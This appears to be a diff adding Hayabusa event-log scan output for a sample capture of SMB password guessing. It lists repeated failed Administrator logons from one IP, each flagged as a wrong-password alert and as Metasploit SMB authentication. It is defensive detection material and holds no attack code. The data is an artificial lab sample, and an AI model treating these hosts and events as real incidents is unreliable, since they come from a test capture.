+2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RmBaLCUcR7TmixTy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1oOBz2NQSCdTwa7V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O4tU1LPF5DRW9Vm0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SRsSNqPYruWBzp2n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3JZhBLzt4af1VtCU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dFLZIKSDBvBaWq59  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: guAG4ZTFMjZAxp1A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yd04xsSIdiczICeG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cx3i1URKPhC6KWI7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Npc6IS27HsWP3JA9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KIBnr0eZ1bHHGokW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6gTTrUVjpPU80LlC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FZlmUbCNAJga24JH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zf3aSGBMe97VujaH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8bx7ZM77aDG7y6Lh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BnHHAClMwyqA3TTI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 00ibRrYvnFt5w9X0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VglTKbnLVFvHZHzQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3NwX0sDFwHQG7Tkq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3mMx3M1zurKMBzyj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sH7b8P0O0uea3PlN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJcrTyBPuX0TcvOT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kwuZIQAL3BmJnPsJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lxgAfsnH6YWLRD0a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ttBOjzmEBjr9W2QW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FPDKGGYkJQeWgtUf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nSoJWqS6YPbpCiBf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pr2oMzxv7pcDfsgw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jiopmZAMpwg3dEaA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tG1Bxm0lt3vwoO5V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Kf5AaQX7KOVAIAN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FW9nBirBTHIXIrfp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S9qKcDhfcf2kMk00  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9NgStzf2xQ4P7q0d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9mCrjQykX06IcMf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7S0QccvEhetekdDP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n1OnibuatFHwDeLz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O8u26bKzFOw12m0T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WEEtOj6BOkI7MPY1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EiCpuqll36DojD3e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p9zjo9ZsSVLZcrsr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KKDD0O5flEsIEDRZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jdPMREVdBEJ50ELC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p7YwRYYCnsr2v08C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nWyAzzpmxUm2CXE9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9RNqhxyUBjUIic0n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
